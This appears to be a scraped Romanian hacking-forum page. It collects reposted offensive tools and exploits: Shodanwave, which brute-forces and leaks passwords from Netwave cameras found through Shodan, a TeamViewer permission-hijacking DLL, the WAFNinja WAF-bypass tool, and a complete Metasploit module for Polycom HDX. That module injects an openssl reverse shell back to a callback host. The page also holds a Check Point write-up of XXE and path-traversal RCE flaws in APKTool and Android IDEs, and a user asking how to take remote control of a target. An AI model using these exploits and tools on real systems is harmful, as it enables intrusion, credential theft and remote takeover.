Leaderboard

Investiti in oua. Multumiti-mi mai tarziu.

Shodanwave Shodanwave is a tool for exploring and obtaining information from cameras specifically Netwave IP Camera. The tool uses a search engine called shodan that makes it easy to search for cameras online. What does the tool to? Look, a list! Search Brute force SSID and WPAPSK Password Disclosure E-mail, FTP, DNS, MSN Password Disclosure Exploit This is an example of shodan wave running, the password was not found through raw force so the tool tries to leak the camera's memory. If the tool finds the password it does not try to leak the memory. Demo https://asciinema.org/a/G7gVOiReMiv43V8wlMbB4mm9B?autoplay=1 How to use? To use shodanwave you need an api key which you can get for free at https://www.shodan.io/, then you need to follow the next steps. Installation $ cd /opt/ $ git clone https://github.com/fbctf/shodanwave.git $ cd shodanwave $ pip install -r requirements.txt Usage Usage: python shodanwave.py -u usernames.txt -w passwords.txt -k Shodan API key --t OUTPUT python shodanwave.py --help __ __ _____/ /_ ____ ____/ /___ _____ _ ______ __ _____ / ___/ __ \/ __ \/ __ / __ `/ __ \ | /| / / __ `/ | / / _ \ (__ ) / / / /_/ / /_/ / /_/ / / / / |/ |/ / /_/ /| |/ / __/ /____/_/ /_/\____/\__,_/\__,_/_/ /_/|__/|__/\__,_/ |___/\___/ This tool is successfully connected to shodan service Information the use of this tool is illegal, not bad. usage: shodanwave.py [-h] [-s SEARCH] [-u USERNAME] [-w PASSWORD] [-k ADDRESS] optional arguments: -h, --help show this help message and exit -s SEARCH, --search SEARCH Default Netwave IP Camera -u USERNAME, --username USERNAME Select your usernames wordlist -w PASSWORD, --wordlist PASSWORD Select your passwords wordlist -k ADDRESS, --shodan ADDRESS Shodan API key -l LIMIT, --limit LIMIT Limit the number of registers responsed by Shodan -o OFFSET, --offset OFFSET Shodan skips this number of registers from response -t OUTPUT, --output OUTPUT Save the results Attention Use this tool wisely and not for evil. To get the best performece of this tool you need to pay for shodan to get full API access Options --limit and --offset may need a paying API key and consume query credits from your Shodan account. Disclaimer Code samples are provided for educational purposes. Adequate defenses can only be built by researching attack techniques available to malicious actors. Using this code against target systems without prior permission is illegal in most jurisdictions. The authors are not liable for any damages from misuse of this information or code. Download: sodanwave-master.zip git clone https://github.com/evilsocketbr/shodanwave.git Source: https://github.com/evilsocketbr/shodanwave

Researchers: Eran Vaknin, Gal Elbaz, Alon Boxiner, Oded Vanunu Latest research from the Check Point Research Team has revealed several vulnerabilities, that puts each and every organization that does any type of Java/Android development at great risk of a threat actor exploiting these vulnerabilities and penetrating them. The vulnerabilities in question are the developer tools, both downloadable and cloud based, that the Android application ecosystem, the largest application community in the world, is using. This includes the tools that all Java/Android programmers use to build their companies business applications and that security analysts and reverse engineers use to do their work. As seen in WikiLeak’s ‘Vault 7’ release earlier this year, the CIA and NSA are exploiting vulnerabilities in products of companies of all sizes, all over the world. Earlier this year we saw incidents of the CIA hacking CCleaner, Notepad++ and many more, with the aim of spreading malwares into organizations and acquiring information on their users, and the companies themselves. Through our own research we have found several vulnerabilities that affect the most common Android IDEs – Google’s Android Studio and JetBrains’ IntelliJ IDEA and Eclipse, as well as the major reverse engineering tools for Android applications such as APKTool, the Cuckoo-Droid service and more. Our research below illustrates how we exploited these tools to gain access to internal files. Since this research, Check Point reported the discovery to APKTool developers and the other IDE companies back in May 2017. In turn, Google and JetBrains have verified and acknowledged the security issues and have since effectively deployed a fix. Technical Details – From XXE to RCE: Attacking The Second Layer The first stage of our research was focused on APKTool, (Android Application Package Tool). As the most popular tool for reverse engineering third party Android apps, APKTool is used for supporting custom platforms, analyzing applications and much more, including the decoding and rebuilding of resources. The two main features of the APKTool are: 1. Decompiling an APK file. 2. Building an APK file. From our research we found that APKTool is vulnerable in both of these main features. By looking at the source code of APKTool, we managed to identify an XML External Entity (XXE) vulnerability, due to the fact that the configured XML parser of APKTool does not disable external entity references when parsing an XML file within the program. The vulnerable function is called loadDocument and it is being used in both core functionalities – ‘Build’ and ‘Decompile’ – of APKTool. The vulnerability exposes the whole OS file system of APKTool users, and as a result, attackers could then potentially retrieve any file on the victim’s PC by using a malicious “AndroidManifest.xml” file that exploits an XXE vulnerability, that could then be sent to a remote attacker server. And this attack scenario is just one of many possible XXE attack techniques that could lead to harmful outcomes. Realizing the enormity of this vulnerability to the Android developer and researcher community, we extended our research to the vulnerable XML parser called “DocumentBuilderFactory”, which is being used in APKTool project. Vulnerabilities in Developer Tools This led us to find multiple vulnerable implementations of the XML parser within other projects. Moreover, we identified that the most popular IDEs that are used for building Android applications are affected – including Intellij, Eclipse, and Android Studio. By simply loading the malicious “AndroidManifest.xml” file as part of any Android project, the IDEs starts spitting out any file configured by the attacker. To demonstrate this vulnerability, we have uploaded a malicious project library to GitHub and cloned it to an Android Studio project. Example of a Malicious Github Project With The XXE Payload: Cloned to Android Studio: Result: The attack was delivered successfully, and the protected file was stolen and sent to the presented attacker’s server without the user being aware of it – See image below: Furthermore, we have found another attack scenario that can be used in the wild to attack a massive range of Android developers by injecting a malicious AAR (Android Archive Library) containing our XXE payload into repositories. It is possible, for example, to upload an infected AAR to a public repository such as the central Maven repository, though for demonstration purposes we have uploaded an infected AAR to a local repository. Cloning the infected AAR from the repository by the victim would allow the attacker to steal sensitive files such as configuration files, source code, company digital proprietary and much more from the OS file system. Uploading a Malicious AAR to Local Repository: Adding the AAR to Android Studio Project: Result: The attack was delivered successfully, and the protected file was stolen and sent to the presented attacker’s server without the user being aware of it: Further research of the APKTool then led us to find an additional vulnerability that allows us to execute OS commands on a victim’s PC. For advance use of APKTool there is a configuration file named “APKTOOL.YML”. This file contains an interesting section called “unknownFiles”, which allows users to include a non-standard file location that will be placed correctly on the rebuild process of an APK. The selected files are saved on the filesystem in the ‘Unknown’ folder. A legitimate “APKTOOL.YML” file structure looks like this: By manipulating the path of the “unknownFiles” section inside the “APKTOOL.YML” file, it is possible to inject arbitrary files anywhere on the file system (Path Traversal). This is due to the fact that the APKTool does not validate the path of which the unknown files will be extracted from the packed APK. Indeed, injecting arbitrary files anywhere in the filesystem leads to full Remote Code Execution (RCE) – meaning that any APKTool user/service that will try to decode a crafted malicious APK is vulnerable to RCE. For demonstration purposes, we have created a Web Application similar to the official online APK decoder ( https://apk.tools ). APKTool will extract the malicious file (in this case we used a PHP web shell) to the wwwroot folder of that server: After building the APK with the modified configuration file, the result is a compressed APK with our malicious file inside the malformed path. Uploading the APK to the demo site allows the attacker to execute OS commands on the web application server. This attack could thus be launched against any online/offline service that decodes APKs behind the scenes using APKTool. The way we chose to demonstrate this vulnerability of course is just one of many possible attack methods that can be used to achieve full RCE. Indeed, the Path Traversal method lets us copy any file to any location on the file system, making the attack surface wide and various. All the attacks methods demonstrated above are cross-platform and generic and, as the APKTool is designed to work on top of several operating systems, it is also possible to attack any system on which it operates without restriction or limitation. It is impossible to estimate the number of users of this well-known open source project. Yet, knowing that among them are some large services and companies (e.g. https://apk.tools, http://www.javadecompilers.com/APKTool, https://www.apkdecompilers.com/, http://undroid.av-comparatives.info, Cuckoo droid and many more), we contacted APKTool developer and IDE companies and are pleased to report that they all fixed the security issues and released updated and improved versions of their products. Source: https://research.checkpoint.com/parsedroid-targeting-android-development-research-community/

A proof of concept injectable C++ dll, that uses naked inline hooking and direct memory modification to change your TeamViewer permissions. Features As the Server - Enables extra menu item options on the right side pop-up menu. Most useful so far to enable the "switch sides" feature which is normally only active after you have already authenticated control with the client, and initiated a change of control/sides. As the Client - Allows for control of mouse with disregard to servers current control settings and permissions. Demo Rundown Utilizes signature/pattern scanning to dynamically locate key parts in the code at which the assembly registers hold pointers to interesting classes. Applies inline naked hooks a.k.a code caves, to hi-jack the pointers to use for modification via direct memory access to their reversed classes. Inject and follow the steps Requirements Your favorite Manual Mapper, PE Loader, DLL Injector, inject into - "TeamViewer.exe" This version was Built on Windows 10, for TeamViewer x86 Version 13.0.5058 - (Other versions of TeamViewer have not been tested but with more robust signatures it may work, linux not supported) Disclaimer Developed for educational purposes as a proof of concept for testing. I do not condone the or support the use of this software for unethical or illicit purposes. No responsibility is held or accepted for misuse. Credit @timse93 - Research and Testing Download: TeamViewer_Permissions_Hook_V1-master.zip Source: https://github.com/gellin/TeamViewer_Permissions_Hook_V1

Within Polycom command shell, a command execution flaw exists in lan traceroute, one of the dev commands, which allows for an attacker to execute arbitrary payloads with telnet or openssl. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Polycom Shell HDX Series Traceroute Command Execution', 'Description' => %q{ Within Polycom command shell, a command execution flaw exists in lan traceroute, one of the dev commands, which allows for an attacker to execute arbitrary payloads with telnet or openssl. }, 'Author' => [ 'Mumbai', # 'staaldraad', # https://twitter.com/_staaldraad/ 'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>', # took some of the code from polycom_hdx_auth_bypass 'h00die <mike@shorebreaksecurity.com>' # stole the code, creds to them ], 'References' => [ ['URL', 'https://staaldraad.github.io/2017/11/12/polycom-hdx-rce/'] ], 'DisclosureDate' => 'Nov 12 2017', 'License' => MSF_LICENSE, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Stance' => Msf::Exploit::Stance::Aggressive, 'Targets' => [[ 'Automatic', {} ]], 'Payload' => { 'Space' => 8000, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'telnet generic openssl'} }, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' }, 'DefaultTarget' => 0 )) register_options( [ Opt::RHOST(), Opt::RPORT(23), OptString.new('PASSWORD', [ false, "Password to access console interface if required."]), OptAddress.new('CBHOST', [ false, "The listener address used for staging the final payload" ]), OptPort.new('CBPORT', [ false, "The listener port used for staging the final payload" ]) ]) end def check connect Rex.sleep(1) res = sock.get_once disconnect if !res && !res.empty? return Exploit::CheckCode::Unknown elsif res =~ /Welcome to ViewStation/ || res =~ /Polycom/ return Exploit::CheckCode::Detected end Exploit::CheckCode::Unknown end def exploit unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to connect to target service") end # # Obtain banner information # sock = connect Rex.sleep(2) banner = sock.get_once vprint_status("Received #{banner.length} bytes from service") vprint_line("#{banner}") if banner =~ /password/i print_status("Authentication enabled on device, authenticating with target...") if datastore['PASSWORD'].nil? print_error("#{peer} - Please supply a password to authenticate with") return end # couldnt find where to enable auth in web interface or telnet...but according to other module it exists..here in case. sock.put("#{datastore['PASSWORD']}\n") res = sock.get_once if res =~ /Polycom/ print_good("#{peer} - Authenticated successfully with target.") elsif res =~ /failed/ print_error("#{peer} - Invalid credentials for target.") return end elsif banner =~ /Polycom/ # praise jesus print_good("#{peer} - Device has no authentication, excellent!") end do_payload(sock) end def do_payload(sock) # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST']) # Start a listener start_listener(true) # Figure out the port we picked cbport = self.service.getsockname[2] cmd = "devcmds\nlan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}#{cbhost}${IFS}-port${IFS}#{cbport}|sh`\n" sock.put(cmd) if datastore['VERBOSE'] Rex.sleep(2) resp = sock.get_once vprint_status("Received #{resp.length} bytes in response") vprint_line(resp) end # Give time for our command to be queued and executed 1.upto(5) do Rex.sleep(1) break if session_created? end end def stage_final_payload(cli) print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...") cli.put(payload.encoded + "\n") end def start_listener(ssl = false) comm = datastore['ListenerComm'] if comm == 'local' comm = ::Rex::Socket::Comm::Local else comm = nil end self.service = Rex::Socket::TcpServer.create( 'LocalPort' => datastore['CBPORT'], 'SSL' => ssl, 'SSLCert' => datastore['SSLCert'], 'Comm' => comm, 'Context' => { 'Msf' => framework, 'MsfExploit' => self } ) self.service.on_client_connect_proc = proc { |client| stage_final_payload(client) } # Start the listening service self.service.start end # Shut down any running services def cleanup super if self.service print_status("Shutting down payload stager listener...") begin self.service.deref if self.service.is_a?(Rex::Service) if self.service.is_a?(Rex::Socket) self.service.close self.service.stop end self.service = nil rescue ::Exception end end end # Accessor for our TCP payload stager attr_accessor :service end Source: https://packetstormsecurity.com/files/145225/Polycom-Shell-HDX-Series-Traceroute-Command-Execution.html

Credeam că recomanzi și tu 2-3 hacherițe să ne crească ouăle

UPnP? Daca routerul are asta activat. Mai da niste detalii. Pentru ce ai nevoie? Edit: @Dragos Ba se poate, de exemplu BitTorrent. Tu cand rulezi un server din reteaua wi-fi ai problema "traversarii" NAT-ului care iti ascunde serverul sub ip-ul local. Exista o solutie universala pentru rezolvarea NAT traversal si ala e protocolul UPnP. (Universal Plug and Play). Nu toate NAT au UPnP activat, dar daca il au poti face portforward announce prin acest protocol. Da un google si gasesti programe care te lasa sa te joci cu protocolul. Eu cu un search am gasit : http://www.raidenhttpd.com/en/manual/en-upnp.html (NU AM TESTAT CE E!) Daca nu are upnp activat si nu merge nu ai alte sanse (din cate stiu eu). Doar sa folosesti un intermediar.

Salut, imi cer scuze pentru ca am postat in sectiunea gresita. Ma gandesc ca aici sunt la sectiunea potrivita. SI revin cu intrebarea: Cine ma poate ajuta sa identific vulnerabilitatiile port-ului 80? Ce exploit-uri pot sa folosesc ca sa obtin controlul remote asupra tintei. Pana acum am incercat tot felul si nu am reusit. Daca imi spune cineva ce imi scapa as fi recunoscator. Multumesc, Ossian.

si btw, nu fac nimic in afara legii, dar multumesc pentru atragerea atentiei oricum.

Multumesc de raspuns! Inteleg si imi accept nivelul la care ma aflu acum, dar fara intrebari, oricat de aberante ar fi ele cum ar fi progres? Daca nu exista intrebarea mea aberanta nu as fi obtinut nici raspunsul de la tine. Am inteles oricum la ce te referi si iti dau dreptate, dar daca poti sa faci un bine ori il faci, ori te lipsesti de atitudini de superioritate, infine nu vreau sa intru in conflict cu nimeni. Apreciez, Ossian. P.S: ,,cel ce intreaba e prost o singura data, cel ce nu intreaba deloc e prost pentru totdeauna,,

WAFNinja WAFNinja - Penetration testers favorite for WAF Bypassing WAFNinja is a CLI tool written in Python. It shall help penetration testers to bypass a WAF by automating steps necessary for bypassing input validation. The tool was created with the objective to be easily extendible, simple to use and usable in a team environment. Many payloads and fuzzing strings, which are stored in a local database file come shipped with the tool. WAFNinja supports HTTP connections, GET and POST requests and the use of Cookies in order to access pages restricted to authenticated users. Also, an intercepting proxy can be set up. Usage wafninja.py [-h] [-v] {fuzz, bypass, insert-fuzz, insert-bypass, set-db} ... EXAMPLE: fuzz: python wafninja.py fuzz -u "http://www.target.com/index.php?id=FUZZ" -c "phpsessid=value" -t xss -o output.html bypass: python wafninja.py bypass -u "http://www.target.com/index.php" -p "Name=PAYLOAD&Submit=Submit" -c "phpsessid=value" -t xss -o output.html insert-fuzz: python wafninja.py insert-fuzz -i select -e select -t sql positional arguments: {fuzz, bypass, insert-fuzz, insert-bypass, set-db} Which function do you want to use? fuzz check which symbols and keywords are allowed by the WAF. bypass sends payloads from the database to the target. insert-fuzz add a fuzzing string insert-bypass add a payload to the bypass list set-db use another database file. Useful to share the same database with others. optional arguments: -h, --help show this help message and exit -v, --version show program's version number and exit I would appreciate any feedback! Cheers, Khalil. Download: WAFNinja-master.zip or git clone https://github.com/khalilbijjou/WAFNinja.git Source: https://github.com/khalilbijjou/WAFNinja